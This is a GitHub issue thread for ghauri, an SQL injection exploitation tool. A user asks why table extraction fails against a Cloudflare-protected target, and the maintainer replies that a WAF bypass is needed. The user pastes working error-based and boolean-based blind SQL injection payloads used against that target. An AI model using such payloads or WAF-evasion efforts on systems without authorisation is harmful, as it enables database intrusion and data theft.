search

r0oth3x49 / ghauri

An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
MIT License
2.98k stars 299 forks source link

Unable to retrieve tables from database #180

Open M4st3r1337 opened 1 day ago

M4st3r1337 commented 1 day ago

Hey , I am unable to retrieve anything besides the version() , database() .. when i try to extract the tables it says [23:28:38] [WARNING] it was not possible to extract query output length for the SQL query provided.

the payloads used to retrieve the database name are : Parameter: id (GET) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR) Payload: id=1 OR 1 GROUP BY CONCAT_WS(0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))HAVING(MIN(0))-- wXyW

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: id=1 OR NOT 09725=9725-- wXyW

btw the target has Cloudflare's WAF .... any help is appreciated

r0oth3x49 commented 1 day ago

That's an intended response from ghauri, you have to find a way to bypass ghauri might not be having bypass for that that's why it returns that warning. If this is a bounty program and you want to collab I can give it a try just sent the details to my email: r0oth3x49@gmail.com